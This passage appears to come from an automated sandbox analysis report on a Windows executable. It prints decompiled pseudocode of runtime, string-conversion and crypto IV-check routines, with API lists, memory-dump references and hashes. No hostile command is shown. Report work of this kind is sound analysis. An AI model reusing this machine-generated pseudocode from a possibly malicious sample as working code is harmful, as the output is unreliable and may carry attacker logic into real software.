                    											if(_t242 < 5) {
                    												continue;
                    											} else {
                    											}
                    											L27:
                    											__eflags = _t242 - 5;
                    											if(__eflags == 0) {
                    												_t88 = _t244 + 8; // 0x8b56ff8b
                    												_t194 = E01409CD8(__eflags, _v704, 1, 0x1423c10, 0x7f,  &_v528,  *_t88, 1);
                    												_t266 = _t266 + 0x1c;
                    												__eflags = _t194;
                    												_t195 = _v704;
                    												if(_t194 == 0) {
                    													_t256[1] = _t195;
                    												} else {
                    													do {
                    														 *(_t260 + _t195 * 2 - 0x20c) =  *(_t260 + _t195 * 2 - 0x20c) & 0x000001ff;
                    														_t195 = _t195 + 1;
                    														__eflags = _t195 - 0x7f;
                    													} while (_t195 < 0x7f);
                    													_t198 = E013F60A6( &_v528,  *0x14353a0, 0xfe);
                    													_t266 = _t266 + 0xc;
                    													__eflags = _t198;
                    													_t256[1] = 0 | _t198 == 0x00000000;
                    												}
                    												_t103 = _t244 + 8; // 0x8b56ff8b
                    												 *_t256 =  *_t103;
                    											}
                    											 *(_t244 + 0x18) = _t256[1];
                    											goto L38;
                    										}
                    										__eflags = _t242;
                    										if(_t242 != 0) {
                    											 *_t256 =  *(_t256 + _t242 * 8);
                    											_t256[1] =  *(_t256 + 4 + _t242 * 8);
                    											 *(_t256 + _t242 * 8) = _v720;
                    											 *(_t256 + 4 + _t242 * 8) = _v708;
                    										}
                    										goto L27;
                    									}
                    									L38:
                    									_t173 = _t205 * 0xc;
                    									_t110 = _t173 + 0x1423b50; // 0x13c50b8
                    									 *0x141a1a8(_t244);
                    									_t175 =  *((intOrPtr*)( *_t110))();
                    									_t226 = _v724;
                    									__eflags = _t175;
                    									if(_t175 == 0) {
                    										__eflags = _t226 - 0x14354a0;
                    										if(_t226 == 0x14354a0) {
                    											L43:
                    											_t176 = _v716;
                    										} else {
                    											_t255 = _t205 + _t205;
                    											__eflags = _t255;
                    											asm("lock xadd [eax], ecx");
                    											if(_t255 != 0) {
                    												goto L43;
                    											} else {
                    												_t128 = _t255 * 8; // 0x30ff068b
                    												E014012E1( *((intOrPtr*)(_t244 + _t128 + 0x28)));
                    												_t131 = _t255 * 8; // 0x30ff0c46
                    												E014012E1( *((intOrPtr*)(_t244 + _t131 + 0x24)));
                    												_t134 = _t205 * 4; // 0xa094
                    												E014012E1( *((intOrPtr*)(_t244 + _t134 + 0xa0)));
                    												_t176 = _v716;
                    												_t229 = _v704;
                    												 *(_t176 + _t244) = _t229;
                    												 *(_t244 + 0xa0 + _t205 * 4) = _t229;
                    											}
                    										}
                    										_t227 = _v732;
                    										 *_t227 = 1;
                    										_t163 =  *(_t176 + _t244);
                    										 *((intOrPtr*)(_t244 + 0x28 + (_t205 + _t205) * 8)) = _t227;
                    									} else {
                    										 *((intOrPtr*)(_v716 + _t244)) = _t226;
                    										_t115 = _t205 * 4; // 0xa094
                    										E014012E1( *((intOrPtr*)(_t244 + _t115 + 0xa0)));
                    										 *(_t244 + 0xa0 + _t205 * 4) = _v736;
                    										E014012E1(_v732);
                    										 *(_t244 + 8) = _v740;
                    										goto L1;
                    									}
                    									goto L2;
                    								}
                    							}
                    						} else {
                    							_t163 = _t240;
                    							goto L2;
                    						}
                    						goto L47;
                    					}
                    					asm("sbb eax, eax");
                    					_t158 = _t157 | 0x00000001;
                    					__eflags = _t158;
                    					goto L10;
                    				} else {
                    					L1:
                    					_t163 = 0;
                    					L2:
                    					return E013F268B(_t163, _v8 ^ _t260);
                    				}
                    				L47:
                    			}

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • _memcmp.LIBVCRUNTIME ref: 01405A8E
                    • _free.LIBCMT ref: 01405AFF
                    • _free.LIBCMT ref: 01405B18
                    • _free.LIBCMT ref: 01405B4A
                    • _free.LIBCMT ref: 01405B53
                    • _free.LIBCMT ref: 01405B5F
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID:
                    • API String ID: 1679612858-0
                    • Opcode ID: 847c2f66b76fc9430dba6c869ffe7fc065a3346e1fef145f1b460107986b7e97
                    • Instruction ID: e296ac00a2988aa64fe3f5a004c9aa6c8a4e2027997817bbfab711387277b1ed
                    • Opcode Fuzzy Hash: 847c2f66b76fc9430dba6c869ffe7fc065a3346e1fef145f1b460107986b7e97
                    • Instruction Fuzzy Hash: 4DB14F7590121A9FDB25DF19C884BAEB7B4FF58314F5045AED909AB3A0E730AE90CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E014095BC(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				void* __ebp;
                    				signed int _t49;
                    				signed int _t54;
                    				int _t57;
                    				signed int _t59;
                    				short* _t61;
                    				signed int _t65;
                    				short* _t69;
                    				int _t77;
                    				short* _t80;
                    				signed int _t86;
                    				signed int _t89;
                    				void* _t94;
                    				void* _t95;
                    				int _t97;
                    				short* _t100;
                    				int _t102;
                    				int _t104;
                    				signed int _t105;
                    				short* _t106;
                    				void* _t109;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t49 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t49 ^ _t105;
                    				_t102 = _a20;
                    				if(_t102 > 0) {
                    					_t77 = E014012C5(_a16, _t102);
                    					_t109 = _t77 - _t102;
                    					_t4 = _t77 + 1; // 0x1
                    					_t102 = _t4;
                    					if(_t109 >= 0) {
                    						_t102 = _t77;
                    					}
                    				}
                    				_t97 = _a32;
                    				if(_t97 == 0) {
                    					_t97 =  *( *_a4 + 8);
                    					_a32 = _t97;
                    				}
                    				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                    				_v12 = _t54;
                    				if(_t54 == 0) {
                    					L38:
                    					return E013F268B(_t54, _v8 ^ _t105);
                    				} else {
                    					_t94 = _t54 + _t54;
                    					_t84 = _t94 + 8;
                    					asm("sbb eax, eax");
                    					if((_t94 + 0x00000008 & _t54) == 0) {
                    						_t80 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t80 == 0) {
                    							L36:
                    							_t104 = 0;
                    							L37:
                    							E013F1B60(_t80);
                    							_t54 = _t104;
                    							goto L38;
                    						}
                    						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
                    						_t120 = _t57;
                    						if(_t57 == 0) {
                    							goto L36;
                    						}
                    						_t99 = _v12;
                    						_t59 = E01407224(_t84, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0);
                    						_t104 = _t59;
                    						if(_t104 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t95 = _t104 + _t104;
                    							_t86 = _t95 + 8;
                    							__eflags = _t95 - _t86;
                    							asm("sbb eax, eax");
                    							__eflags = _t86 & _t59;
                    							if((_t86 & _t59) == 0) {
                    								_t100 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t100;
                    								if(__eflags == 0) {
                    									L35:
                    									E013F1B60(_t100);
                    									goto L36;
                    								}
                    								_t61 = E01407224(_t86, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
                    								__eflags = _t61;
                    								if(_t61 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
                    								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                    								__eflags = _t104;
                    								if(_t104 != 0) {
                    									E013F1B60(_t100);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t89 = _t95 + 8;
                    							__eflags = _t95 - _t89;
                    							asm("sbb eax, eax");
                    							_t65 = _t59 & _t89;
                    							_t86 = _t95 + 8;
                    							__eflags = _t65 - 0x400;
                    							if(_t65 > 0x400) {
                    								__eflags = _t95 - _t86;
                    								asm("sbb eax, eax");
                    								_t100 = E0140131B(_t86, _t65 & _t86);
                    								_pop(_t86);
                    								__eflags = _t100;
                    								if(_t100 == 0) {
                    									goto L35;
                    								}
                    								 *_t100 = 0xdddd;
                    								L28:
                    								_t100 =  &(_t100[4]);
                    								goto L30;
                    							}
                    							__eflags = _t95 - _t86;
                    							asm("sbb eax, eax");
                    							E013F2CE0();
                    							_t100 = _t106;
                    							__eflags = _t100;
                    							if(_t100 == 0) {
                    								goto L35;
                    							}
                    							 *_t100 = 0xcccc;
                    							goto L28;
                    						}
                    						_t69 = _a28;
                    						if(_t69 == 0) {
                    							goto L37;
                    						}
                    						_t124 = _t104 - _t69;
                    						if(_t104 > _t69) {
                    							goto L36;
                    						}
                    						_t104 = E01407224(0, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
                    						if(_t104 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t71 = _t54 & _t94 + 0x00000008;
                    					_t84 = _t94 + 8;
                    					if((_t54 & _t94 + 0x00000008) > 0x400) {
                    						__eflags = _t94 - _t84;
                    						asm("sbb eax, eax");
                    						_t80 = E0140131B(_t84, _t71 & _t84);
                    						_pop(_t84);
                    						__eflags = _t80;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
                    						 *_t80 = 0xdddd;
                    						L12:
                    						_t80 =  &(_t80[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E013F2CE0();
                    					_t80 = _t106;
                    					if(_t80 == 0) {
                    						goto L36;
                    					}
                    					 *_t80 = 0xcccc;
                    					goto L12;
                    				}
                    			}




























                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0140980D,00000001,00000001,?), ref: 01409616
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0140980D,00000001,00000001,?,00000000,?,?), ref: 0140969C
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 01409796
                    • __freea.LIBCMT ref: 014097A3
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • __freea.LIBCMT ref: 014097AC
                    • __freea.LIBCMT ref: 014097D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocHeap
                    • String ID:
                    • API String ID: 3147120248-0
                    • Opcode ID: 9732d6e5b4b95c49d9a702815c7994bcc44e4db3dac8af5c3f5b42f2e478967b
                    • Instruction ID: 273d4b1880e68debf881e281f6b60062a80e269705aad7d72dc21c4f7ae9f114
                    • Opcode Fuzzy Hash: 9732d6e5b4b95c49d9a702815c7994bcc44e4db3dac8af5c3f5b42f2e478967b
                    • Instruction Fuzzy Hash: C051E873610206EBEB268E6ADC40EAB7BA9EB90654F15063EFE08D71A1DB35DC50C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E01400E84(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				char* _v44;
                    				char _v48;
                    				void* __ecx;
                    				signed int _t67;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t75;
                    				intOrPtr _t76;
                    				signed int _t79;
                    				signed int _t86;
                    				intOrPtr _t88;
                    				void* _t97;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t103;
                    				void* _t108;
                    				signed int _t112;
                    				signed int _t113;
                    				signed int _t116;
                    				void* _t120;
                    				signed int _t123;
                    				signed int _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				intOrPtr _t130;
                    				signed int _t131;
                    				void* _t135;
                    				void* _t136;
                    				void* _t138;
                    
                    				_t120 = __edx;
                    				_t97 = __ebx;
                    				_push(_t101);
                    				if(_a8 != 0) {
                    					_push(__esi);
                    					_push(__edi);
                    					_t123 = 0;
                    					_t67 = E013FF59B( &_v8, 0, 0, _a8, 0x7fffffff);
                    					_t136 = _t135 + 0x14;
                    					__eflags = _t67;
                    					if(_t67 == 0) {
                    						L5:
                    						_t128 = E014009B2(_t101, _v8, 2);
                    						_pop(_t103);
                    						__eflags = _t128;
                    						if(_t128 == 0) {
                    							L11:
                    							E014012E1(_t128);
                    							_t70 = _t123;
                    							goto L12;
                    						} else {
                    							_t71 = E013FF59B(_t123, _t128, _v8, _a8, 0xffffffff);
                    							_t136 = _t136 + 0x14;
                    							__eflags = _t71;
                    							if(_t71 == 0) {
                    								_t123 = E014052E6(_t103, _a4, _t128);
                    								goto L11;
                    							} else {
                    								__eflags = _t71 - 0x16;
                    								if(_t71 == 0x16) {
                    									goto L13;
                    								} else {
                    									__eflags = _t71 - 0x22;
                    									if(_t71 != 0x22) {
                    										goto L11;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t67 - 0x16;
                    						if(_t67 == 0x16) {
                    							L13:
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							E013FDA8E();
                    							asm("int3");
                    							E013F3660(0x14339c8, 0x1c);
                    							_t130 = _a4;
                    							_t75 = E01400E84(_t97, _t120, _t123, _t130, _t130, _a8);
                    							_t108 = _t123;
                    							_t125 = _t75;
                    							__eflags = _t125;
                    							if(_t125 != 0) {
                    								_t76 = E01406A01(_t97, _t108, _t120);
                    								_v40 = _t76;
                    								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                    								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v32 = 0;
                    								_t79 = E013FF83C( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                    								_t138 = _t136 + 0x18;
                    								__eflags = _t79;
                    								if(_t79 == 0) {
                    									L22:
                    									_t99 = E0140131B(_t110, _v32 + 4);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										goto L15;
                    									} else {
                    										_t20 = _t99 + 4; // 0x4
                    										_v36 = _t20;
                    										_t110 =  &_v48;
                    										_t125 = 0;
                    										_t86 = E013FF83C( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                    										_t138 = _t138 + 0x18;
                    										__eflags = _t86;
                    										if(_t86 == 0) {
                    											L29:
                    											_t126 = _v48;
                    											E01400941(4);
                    											_pop(_t112);
                    											_v8 = _v8 & 0x00000000;
                    											_t131 = _t130 + _t130;
                    											_t113 = _t112 | 0xffffffff;
                    											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    											if(__eflags != 0) {
                    												asm("lock xadd [edx], eax");
                    												if(__eflags == 0) {
                    													E014012E1( *(_t126 + 0x24 + _t131 * 8));
                    													_pop(_t116);
                    													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    													_t113 = _t116 | 0xffffffff;
                    													__eflags = _t113;
                    												}
                    											}
                    											_t88 = _v40;
                    											__eflags =  *(_t88 + 0x350) & 0x00000002;
                    											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                    												__eflags =  *0x14354b0 & 0x00000001;
                    												if(( *0x14354b0 & 0x00000001) == 0) {
                    													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                    														asm("lock xadd [eax], ecx");
                    														__eflags = _t113 == 1;
                    														if(_t113 == 1) {
                    															E014012E1( *(_t126 + 0x24 + _t131 * 8));
                    															_t51 = _t126 + 0x24 + _t131 * 8;
                    															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    															__eflags =  *_t51;
                    														}
                    													}
                    												}
                    											}
                    											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                    											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                    											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                    											_v8 = 0xfffffffe;
                    											E01401075();
                    										} else {
                    											__eflags = _t86 - 0x16;
                    											if(_t86 == 0x16) {
                    												L26:
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												goto L20;
                    											} else {
                    												__eflags = _t86 - 0x22;
                    												if(_t86 != 0x22) {
                    													__eflags = _t86;
                    													if(_t86 == 0) {
                    														goto L29;
                    													} else {
                    														E014012E1(_t99);
                    														goto L15;
                    													}
                    												} else {
                    													goto L26;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags = _t79 - 0x16;
                    									if(_t79 == 0x16) {
                    										L19:
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										L20:
                    										_t79 = E013FDA8E();
                    									} else {
                    										__eflags = _t79 - 0x22;
                    										if(_t79 == 0x22) {
                    											goto L19;
                    										}
                    									}
                    									__eflags = _t79;
                    									if(_t79 != 0) {
                    										goto L15;
                    									} else {
                    										goto L22;
                    									}
                    								}
                    							} else {
                    								L15:
                    							}
                    							return E013F36A6();
                    						} else {
                    							__eflags = _t67 - 0x22;
                    							if(_t67 == 0x22) {
                    								goto L13;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					_t70 = E014052E6(_t101, _a4, 0);
                    					L12:
                    					return _t70;
                    				}
                    			}





































                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: b358be46b9d81b4b432490f8931d08f1fc3bc31aa94175154a5d2d9e551febcc
                    • Instruction ID: 2ac636227d9ec5d1b1b44dbe936972b51e49cf03c700fc1d3f2e02daeabb91b5
                    • Opcode Fuzzy Hash: b358be46b9d81b4b432490f8931d08f1fc3bc31aa94175154a5d2d9e551febcc
                    • Instruction Fuzzy Hash: 70512B72904205ABEB229B5F8C40FAF7BA8AF587B0F10013FF914E72E1DB75D5019664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E01406A01(void* __ebx, void* __ecx, void* __edx) {
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t3;
                    				void* _t4;
                    				intOrPtr _t9;
                    				void* _t11;
                    				void* _t20;
                    				void* _t21;
                    				void* _t23;
                    				void* _t25;
                    				void* _t27;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				long _t36;
                    				long _t37;
                    				void* _t40;
                    
                    				_t29 = __edx;
                    				_t23 = __ecx;
                    				_t20 = __ebx;
                    				_t36 = GetLastError();
                    				_t2 =  *0x14353a4; // 0x6
                    				_t42 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t3 = E014009B2(_t23, 1, 0x364);
                    					_t31 = _t3;
                    					_pop(_t25);
                    					if(_t31 != 0) {
                    						_t4 = E01406F75(_t25, __eflags,  *0x14353a4, _t31);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E01406873(_t25, _t31, 0x143a950);
                    							E014012E1(0);
                    							_t40 = _t40 + 0xc;
                    							__eflags = _t31;
                    							if(_t31 == 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t31);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t3);
                    						L4:
                    						E014012E1();
                    						_pop(_t25);
                    						L9:
                    						SetLastError(_t36);
                    						E01401369(_t20, _t29, _t36);
                    						asm("int3");
                    						_push(_t20);
                    						_push(_t36);
                    						_push(_t31);
                    						_t37 = GetLastError();
                    						_t21 = 0;
                    						_t9 =  *0x14353a4; // 0x6
                    						_t45 = _t9 - 0xffffffff;
                    						if(_t9 == 0xffffffff) {
                    							L12:
                    							_t32 = E014009B2(_t25, 1, 0x364);
                    							_pop(_t27);
                    							if(_t32 != 0) {
                    								_t11 = E01406F75(_t27, __eflags,  *0x14353a4, _t32);
                    								__eflags = _t11;
                    								if(_t11 != 0) {
                    									E01406873(_t27, _t32, 0x143a950);
                    									E014012E1(_t21);
                    									__eflags = _t32;
                    									if(_t32 != 0) {
                    										goto L19;
                    									} else {
                    										goto L18;
                    									}
                    								} else {
                    									_push(_t32);
                    									goto L14;
                    								}
                    							} else {
                    								_push(_t21);
                    								L14:
                    								E014012E1();
                    								L18:
                    								SetLastError(_t37);
                    							}
                    						} else {
                    							_t32 = E01406F1F(_t25, _t45, _t9);
                    							if(_t32 != 0) {
                    								L19:
                    								SetLastError(_t37);
                    								_t21 = _t32;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						return _t21;
                    					}
                    				} else {
                    					_t31 = E01406F1F(_t23, _t42, _t2);
                    					if(_t31 != 0) {
                    						L8:
                    						SetLastError(_t36);
                    						return _t31;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}





















                    APIs
                    • GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                    • _free.LIBCMT ref: 01406A38
                    • _free.LIBCMT ref: 01406A60
                    • SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                    • _abort.LIBCMT ref: 01406A7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 35f15e8919e09d25f1951db6a5e254add6f366aadcd7c350bcbf1bbf7e9c11c5
                    • Instruction ID: 637764808445d6c7b95057627f228b990ad9ae1b77ec58c64abb016fe26cb4d8
                    • Opcode Fuzzy Hash: 35f15e8919e09d25f1951db6a5e254add6f366aadcd7c350bcbf1bbf7e9c11c5
                    • Instruction Fuzzy Hash: 8FF0F9721415022BD213723B6C08F2B1B668FE3671B23403FF506E72F4EE34C5664610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013CCEF0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
                    				intOrPtr _v0;
                    				char _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v60;
                    				char _v64;
                    				char _v88;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				char _v196;
                    				char _v220;
                    				char _v244;
                    				char _v268;
                    				char _v292;
                    				char _v316;
                    				char _v340;
                    				char _v364;
                    				char _v388;
                    				char _v412;
                    				char _v436;
                    				intOrPtr _v440;
                    				intOrPtr _v456;
                    				char _v476;
                    				signed int _v480;
                    				void* __ebp;
                    				signed int _t64;
                    				signed int _t65;
                    				intOrPtr _t67;
                    				void* _t68;
                    				intOrPtr _t69;
                    				void* _t70;
                    				void* _t81;
                    				void* _t83;
                    				void* _t85;
                    				void* _t87;
                    				void* _t89;
                    				signed int _t94;
                    				signed int _t95;
                    				intOrPtr* _t102;
                    				void* _t103;
                    				void* _t113;
                    				void* _t115;
                    				void* _t117;
                    				void* _t119;
                    				void* _t121;
                    				intOrPtr _t126;
                    				intOrPtr* _t157;
                    				intOrPtr* _t158;
                    				void* _t162;
                    				intOrPtr* _t163;
                    				signed int _t165;
                    				signed int _t166;
                    				void* _t167;
                    				void* _t168;
                    				signed int _t170;
                    
                    				_push(0xffffffff);
                    				_push(E014167F7);
                    				_push( *[fs:0x0]);
                    				_t168 = _t167 - 0x1a8;
                    				_t64 =  *0x1435234; // 0x78d9f939
                    				_t65 = _t64 ^ _t165;
                    				_v20 = _t65;
                    				_push(__ebx);
                    				_push(__edi);
                    				_push(_t65);
                    				 *[fs:0x0] =  &_v16;
                    				_t160 = __ecx;
                    				_t126 = _a4;
                    				_t67 =  *__ecx;
                    				_v440 = _t126;
                    				if(_t126 >= 0) {
                    					_t68 =  *((intOrPtr*)(_t67 + 0x24))();
                    					__eflags = _t126 - _t68;
                    					_t69 =  *__ecx;
                    					if(_t126 < _t68) {
                    						_t158 =  *((intOrPtr*)(_t69 + 0x34))();
                    						_t126 = E013E9DA0( &_v124,  *((intOrPtr*)( *__ecx + 0x24))(), 0xa);
                    						_v8 = 0;
                    						_t160 = E013CADA0( &_v148, _v440, 0xa);
                    						_t154 =  *_t158;
                    						_t148 = _t158;
                    						_v8 = 1;
                    						_t113 =  *((intOrPtr*)( *_t158 + 8))( &_v172);
                    						_v8 = 2;
                    						_t115 = E013C1DF7(_t126, _t158,  *_t158,  &_v196, _t113, ": IV length ");
                    						_v8 = 3;
                    						_t117 = E013C1DA9(_t126, _t158, _t158,  &_v220, _t115, _t160);
                    						_v8 = 4;
                    						_t119 = E013C1DF7(_t126, _t158, _t154,  &_v244, _t117, " is less than the minimum of ");
                    						_v8 = 5;
                    						_t121 = E013C1DA9(_t126, _t148, _t158,  &_v268, _t119, _t126);
                    						_t168 = _t168 + 0x48;
                    						_v8 = 6;
                    						E013CB190(_t121);
                    						_t69 = E013F4EC6( &_v60, 0x1430adc);
                    					}
                    					_t70 =  *((intOrPtr*)(_t69 + 0x28))();
                    					__eflags = _t126 - _t70;
                    					if(_t126 <= _t70) {
                    						goto L2;
                    					} else {
                    						_t157 =  *((intOrPtr*)( *_t160 + 0x34))();
                    						_t128 = E013E9DA0( &_v292,  *((intOrPtr*)( *_t160 + 0x28))(), 0xa);
                    						_v8 = 7;
                    						_t162 = E013CADA0( &_v316, _v440, 0xa);
                    						_t151 =  *_t157;
                    						_t137 = _t157;
                    						_v8 = 8;
                    						_t81 =  *((intOrPtr*)( *_t157 + 8))( &_v340);
                    						_v8 = 9;
                    						_t83 = E013C1DF7(_t77, _t157,  *_t157,  &_v364, _t81, ": IV length ");
                    						_v8 = 0xa;
                    						_t85 = E013C1DA9(_t77, _t157, _t157,  &_v388, _t83, _t162);
                    						_v8 = 0xb;
                    						_t87 = E013C1DF7(_t128, _t157, _t151,  &_v412, _t85, " exceeds the maximum of ");
                    						_v8 = 0xc;
                    						_t89 = E013C1DA9(_t128, _t137, _t157,  &_v436, _t87, _t128);
                    						_t170 = _t168 + 0x48;
                    						_v8 = 0xd;
